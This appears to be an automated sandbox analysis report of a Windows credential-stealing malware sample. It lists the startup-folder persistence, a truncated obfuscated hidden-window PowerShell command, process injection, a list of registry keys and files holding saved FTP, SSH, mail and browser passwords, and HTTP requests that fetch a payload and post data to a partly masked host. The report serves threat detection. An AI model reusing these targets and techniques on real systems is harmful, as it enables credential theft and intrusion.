Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- %APPDATA%\microsoft\windows\start menu\programs\startup\jgfn.lnk
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c8e97 {param($t28bcf7)$c677a4='t41e9';$jcfb2='';for ($i=0; $i -lt $t28bcf7.length;$i+=2){$ye1b8=[convert]::ToByte($t28bcf7.Substring($i,2),16);$jcfb2+=[char]($ye1...
Injects code into
the following user processes:
- jgfn.exe
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\LinasFTP\Site Manager]
- [<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
- [<HKCU>\Software\Ghisler\Total Commander]
- [<HKCU>\Software\Far\Plugins\FTP\Hosts]
- [<HKCU>\Software\Far2\Plugins\FTP\Hosts]
- [<HKCU>\Software\VanDyke\SecureFX]
- [<HKLM>\Software\Wow6432Node\NCH Software\Fling\Accounts]
- [<HKCU>\Software\NCH Software\Fling\Accounts]
- [<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\SimonTatham\PuTTY\Sessions]
- [<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
- [<HKCU>\Software\Martin Prikryl]
- [<HKLM>\Software\Wow6432Node\Martin Prikryl]
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
Reads files which store third party applications passwords
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
Modifies file system
Creates the following files
- %TEMP%\qt2vsste.0.cs
- %TEMP%\csc8e38.tmp
- %TEMP%\res8e49.tmp
- %TEMP%\qhds6eud.dll
- %TEMP%\pn48mpwm.0.cs
- %TEMP%\pn48mpwm.cmdline
- %TEMP%\pn48mpwm.out
- %TEMP%\csc9b28.tmp
- %TEMP%\pn48mpwm.dll
- %APPDATA%\e6f983\35a09b.hdb
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{5059f91f-c3d9-4a71-8f0e-5404aadcf0a3}.tmp
- %APPDATA%\tb59ec1.exe
- %HOMEPATH%\jgfn.exe
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\qhds6eud.out
- %TEMP%\res9b39.tmp
- %TEMP%\qhds6eud.cmdline
- %TEMP%\i09z3d7u.out
- %TEMP%\qt2vsste.cmdline
- %TEMP%\qt2vsste.out
- %TEMP%\s9l1x00x.0.cs
- %TEMP%\s9l1x00x.cmdline
- %TEMP%\s9l1x00x.out
- %TEMP%\i09z3d7u.0.cs
- %TEMP%\i09z3d7u.cmdline
- %TEMP%\csc80f9.tmp
- %TEMP%\i09z3d7u.dll
- %TEMP%\csc8147.tmp
- %TEMP%\csc8213.tmp
- %TEMP%\res810a.tmp
- %TEMP%\s9l1x00x.dll
- %TEMP%\res8158.tmp
- %TEMP%\res8214.tmp
- %TEMP%\qt2vsste.dll
- %TEMP%\qhds6eud.0.cs
- %APPDATA%\e6f983\35a09b.lck
Sets the 'hidden' attribute to the following files
- %APPDATA%\e6f983\35a09b.exe
Deletes the following files
- %TEMP%\res810a.tmp
- %TEMP%\res8e49.tmp
- %TEMP%\csc8e38.tmp
- %TEMP%\qhds6eud.dll
- %TEMP%\qhds6eud.pdb
- %TEMP%\qhds6eud.cmdline
- %TEMP%\s9l1x00x.out
- %TEMP%\s9l1x00x.cmdline
- %TEMP%\qhds6eud.out
- %TEMP%\csc9b28.tmp
- %TEMP%\pn48mpwm.dll
- %TEMP%\pn48mpwm.out
- %TEMP%\pn48mpwm.pdb
- %TEMP%\pn48mpwm.0.cs
- %TEMP%\qhds6eud.0.cs
- %TEMP%\res9b39.tmp
- %TEMP%\s9l1x00x.0.cs
- %TEMP%\s9l1x00x.pdb
- %TEMP%\s9l1x00x.dll
- %TEMP%\res8158.tmp
- %TEMP%\csc8147.tmp
- %TEMP%\res8214.tmp
- %TEMP%\csc8213.tmp
- %TEMP%\qt2vsste.cmdline
- %TEMP%\qt2vsste.pdb
- %TEMP%\csc80f9.tmp
- %TEMP%\qt2vsste.0.cs
- %TEMP%\qt2vsste.dll
- %TEMP%\i09z3d7u.out
- %TEMP%\i09z3d7u.dll
- %TEMP%\i09z3d7u.0.cs
- %TEMP%\i09z3d7u.pdb
- %TEMP%\i09z3d7u.cmdline
- %TEMP%\qt2vsste.out
- %TEMP%\pn48mpwm.cmdline
- %APPDATA%\e6f983\35a09b.lck
Moves the following files
- from %HOMEPATH%\jgfn.exe to %APPDATA%\e6f983\35a09b.exe
Substitutes the following files
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Network activity
Connects to
- 'ma##iq.org':80
TCP
HTTP GET requests
- http://10#.#89.10.150/Ps5/059772.jpg
HTTP POST requests
- http://ma##iq.org/liv-01/pin.php
UDP
- DNS ASK ma##iq.org
Miscellaneous
Creates and executes the following
- '%APPDATA%\tb59ec1.exe'
- '%HOMEPATH%\jgfn.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c8e97 {param($t28bcf7)$c677a4='t41e9';$jcfb2='';for ($i=0; $i -lt $t28bcf7.length;$i+=2){$ye1b8=[convert]::ToByte($t28bcf7.Substring($i,2),16);$jcfb2+=[char]($ye1...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qt2vsste.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s9l1x00x.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\i09z3d7u.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES810A.tmp" "%TEMP%\CSC80F9.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8158.tmp" "%TEMP%\CSC8147.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8214.tmp" "%TEMP%\CSC8213.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qhds6eud.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8E49.tmp" "%TEMP%\CSC8E38.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pn48mpwm.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9B39.tmp" "%TEMP%\CSC9B28.tmp"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\tb59ec1.exe" "%HOMEPATH%\jgfn.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\jgfn.exe"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qt2vsste.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s9l1x00x.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\i09z3d7u.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES810A.tmp" "%TEMP%\CSC80F9.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8158.tmp" "%TEMP%\CSC8147.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8214.tmp" "%TEMP%\CSC8213.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qhds6eud.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8E49.tmp" "%TEMP%\CSC8E38.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pn48mpwm.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9B39.tmp" "%TEMP%\CSC9B28.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\tb59ec1.exe" "%HOMEPATH%\jgfn.exe"
- '%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\jgfn.exe"
